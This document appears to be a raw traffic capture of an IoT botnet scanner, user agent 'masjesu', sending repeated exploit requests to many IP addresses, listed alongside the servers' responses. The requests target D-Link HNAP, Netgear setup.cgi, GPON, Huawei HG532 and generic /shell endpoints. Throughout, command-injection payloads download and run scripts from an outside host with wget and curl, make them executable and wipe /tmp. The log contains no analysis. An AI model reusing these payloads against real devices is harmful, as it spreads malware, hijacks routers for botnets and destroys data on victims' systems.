SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
ResponseHTTP/1.1 400 Bad Request
Date: Fri, 28 Feb 2025 19:34:01 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=iso-8859-1
-
GEThttp://104.130.219.14:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.1 302 Found
Date: Fri, 28 Feb 2025 19:34:01 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Location: https://www.astarna.com/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
Content-Length: 447
Connection: close
Content-Type: text/html; charset=iso-8859-1
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.1 302 Found
Date: Fri, 28 Feb 2025 19:34:03 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Location: https://www.astarna.com/GponForm/diag_Form?images/
Content-Length: 309
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
GEThttp://23.0.152.238:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 23.0.152.238:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 312
Expires: Fri, 28 Feb 2025 19:34:11 GMT
Date: Fri, 28 Feb 2025 19:34:11 GMT
Connection: close
-
POSThttp://23.0.152.238:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 23.0.152.238:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 351
Expires: Fri, 28 Feb 2025 19:34:11 GMT
Date: Fri, 28 Feb 2025 19:34:11 GMT
Connection: close
-
GEThttp://23.0.152.238:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 310
Expires: Fri, 28 Feb 2025 19:34:11 GMT
Date: Fri, 28 Feb 2025 19:34:11 GMT
Connection: close
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 310
Expires: Fri, 28 Feb 2025 19:34:11 GMT
Date: Fri, 28 Feb 2025 19:34:11 GMT
Connection: close
-
GEThttp://85.159.98.204:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 85.159.98.204:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.0 302 Moved Temporarily
Location: https://85.159.98.204/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
Server: BigIP
Connection: Keep-Alive
Content-Length: 0
-
POSThttp://85.159.98.204:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 85.159.98.204:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
ResponseHTTP/1.0 302 Moved Temporarily
Location: https://85.159.98.204/HNAP1/
Server: BigIP
Connection: close
Content-Length: 0
-
GEThttp://85.159.98.204:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.0 302 Moved Temporarily
Location: https:///setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
Server: BigIP
Connection: close
Content-Length: 0
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.0 302 Moved Temporarily
Location: https://127.0.0.1/GponForm/diag_Form?images/
Server: BigIP
Connection: Keep-Alive
Content-Length: 0
-
GEThttp://154.215.93.212:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 154.215.93.212:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
-
POSThttp://154.215.93.212:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 154.215.93.212:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
-
GEThttp://154.215.93.212:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
-
GEThttp://79.132.136.127:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 79.132.136.127:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
-
POSThttp://79.132.136.127:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 79.132.136.127:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
-
GEThttp://79.132.136.127:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
-
POSThttp://35.186.199.150:37215/ctrlt/DeviceUpgrade_1RequestPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Host: 35.186.199.150:37215
Content-Length: 601
Connection: keep-alive
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
-
GEThttp://23.44.178.183:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 23.44.178.183:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 312
Expires: Fri, 28 Feb 2025 19:34:40 GMT
Date: Fri, 28 Feb 2025 19:34:40 GMT
Connection: close
-
POSThttp://23.44.178.183:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 23.44.178.183:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 351
Expires: Fri, 28 Feb 2025 19:34:40 GMT
Date: Fri, 28 Feb 2025 19:34:40 GMT
Connection: close
-
GEThttp://23.44.178.183:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 312
Expires: Fri, 28 Feb 2025 19:34:40 GMT
Date: Fri, 28 Feb 2025 19:34:40 GMT
Connection: close
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 310
Expires: Fri, 28 Feb 2025 19:34:40 GMT
Date: Fri, 28 Feb 2025 19:34:40 GMT
Connection: close
-
POSThttp://127.0.0.1:5555/UD/act?1RequestPOST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:5555
User-Agent: masjesu
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 640
-
GEThttp://104.71.127.59:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 104.71.127.59:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 310
Expires: Fri, 28 Feb 2025 19:34:45 GMT
Date: Fri, 28 Feb 2025 19:34:45 GMT
Connection: close
-
POSThttp://104.71.127.59:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 104.71.127.59:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 351
Expires: Fri, 28 Feb 2025 19:34:45 GMT
Date: Fri, 28 Feb 2025 19:34:45 GMT
Connection: close
-
GEThttp://104.71.127.59:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 312
Expires: Fri, 28 Feb 2025 19:34:45 GMT
Date: Fri, 28 Feb 2025 19:34:45 GMT
Connection: close
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 312
Expires: Fri, 28 Feb 2025 19:34:45 GMT
Date: Fri, 28 Feb 2025 19:34:45 GMT
Connection: close
-
GEThttp://38.174.170.219:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 38.174.170.219:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
-
POSThttp://38.174.170.219:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 38.174.170.219:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
-
GEThttp://38.174.170.219:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
-
GEThttp://63.195.198.112:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 63.195.198.112:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.1 302 Found
Server: nginx
Date: Fri, 28 Feb 2025 19:34:48 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Cache-control: close,private,no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0,false
Pragma: no-cache
Location: https://vgw1-01.mia-avalonmerrickpark.mdu.attwifi.com/portal/attwifi?desired_url=http%3A%2F%2F63.195.198.112%2Fshell%3Fcd%2B%2Ftmp%3Brm%2B-rf%2B%2A%3Bwget%2Bhttp%3A%2F%2F37.44.238.88%2Fl7vmra%3Bchmod%2B777%2Bl7vmra%3B%2Ftmp%2Fl7vmra
X-Request-Id: 04d96d70-4624-4699-985a-c4411a062f1a
X-Runtime: 0.176486
Vary: Origin
-
POSThttp://63.195.198.112:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 63.195.198.112:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
-
GEThttp://63.195.198.112:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Feb 2025 19:34:48 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Cache-Control: no-cache
X-Request-Id: 7502cec8-201e-4f5b-a163-14fe4c3408e1
X-Runtime: 0.133404
Vary: Origin
-
DNSResponseHTTP/1.1 400 Bad Request
Server: nginx
Date: Fri, 28 Feb 2025 19:34:48 GMT
Content-Type: text/html
Content-Length: 150
Connection: close
-
GEThttp://23.35.51.108:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 23.35.51.108:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 308
Expires: Fri, 28 Feb 2025 19:34:56 GMT
Date: Fri, 28 Feb 2025 19:34:56 GMT
Connection: close
-
POSThttp://23.35.51.108:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 23.35.51.108:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 349
Expires: Fri, 28 Feb 2025 19:34:56 GMT
Date: Fri, 28 Feb 2025 19:34:56 GMT
Connection: close
-
GEThttp://23.35.51.108:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 308
Expires: Fri, 28 Feb 2025 19:34:56 GMT
Date: Fri, 28 Feb 2025 19:34:56 GMT
Connection: close
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 308
Expires: Fri, 28 Feb 2025 19:34:56 GMT
Date: Fri, 28 Feb 2025 19:34:56 GMT
Connection: close
-
GEThttp://40.143.156.206:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 40.143.156.206:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
-
POSThttp://40.143.156.206:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 40.143.156.206:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
ResponseHTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 28 Feb 2025 19:34:56 GMT
Connection: close
Content-Length: 311
-
GEThttp://40.143.156.206:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
-
GEThttp://151.236.84.163:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 151.236.84.163:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 28 Feb 2025 19:35:00 GMT
Content-Type: text/html
Content-Length: 146
Connection: keep-alive
-
POSThttp://151.236.84.163:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 151.236.84.163:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
ResponseHTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 28 Feb 2025 19:35:00 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
-
GEThttp://151.236.84.163:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 28 Feb 2025 19:35:00 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 28 Feb 2025 19:35:00 GMT
Content-Type: text/html
Content-Length: 146
Connection: keep-alive
-
DNSResponseHTTP/1.1 400 Bad Request
Server: nginx
Date: Fri, 28 Feb 2025 19:35:00 GMT
Content-Type: text/html
Content-Length: 150
Connection: close
-
GEThttp://167.71.139.23:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 167.71.139.23:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
-
POSThttp://167.71.139.23:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 167.71.139.23:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
-
